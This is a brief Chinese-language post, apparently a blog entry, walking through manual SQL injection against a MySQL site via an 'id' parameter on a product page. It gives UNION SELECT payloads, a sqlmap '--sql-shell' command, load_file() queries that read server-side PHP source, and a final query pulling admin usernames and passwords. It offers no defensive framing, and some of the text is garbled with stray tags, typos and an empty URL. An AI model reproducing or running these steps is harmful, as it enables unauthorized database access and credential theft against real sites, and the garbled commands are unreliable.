您的位置:首页 > 数据库 > MySQL

Mysql5.0以下 手工注入

2016-05-12 22:48 1031 查看
order by 20

www. .com/product/introduction.php?id=-65 UNION SELECT user(),2

www. .com/product/introduction.php?id=-65 UNION SELECT @@versions,2

报错

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/webroot/cw/product/introduction.php on line 71

使用sqlmap 将/home/webroot/cw/product/introduction.php带入

sqlmap -u "" --sql-sehll

select load_file('[b]/home/webroot/cw/product/introduction.php') 查看[b]introduction.php的源码[/b][/b]

[b][b]

[/b][/b]

[b][b]依次类推,可以找出更多的文件路径[/b][/b]

[b][b]找出管理登录目录[/b][/b]

select load_file('/home/webroot/cw/check.php')

查找管理员表,列

select user,pwd from admin;

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: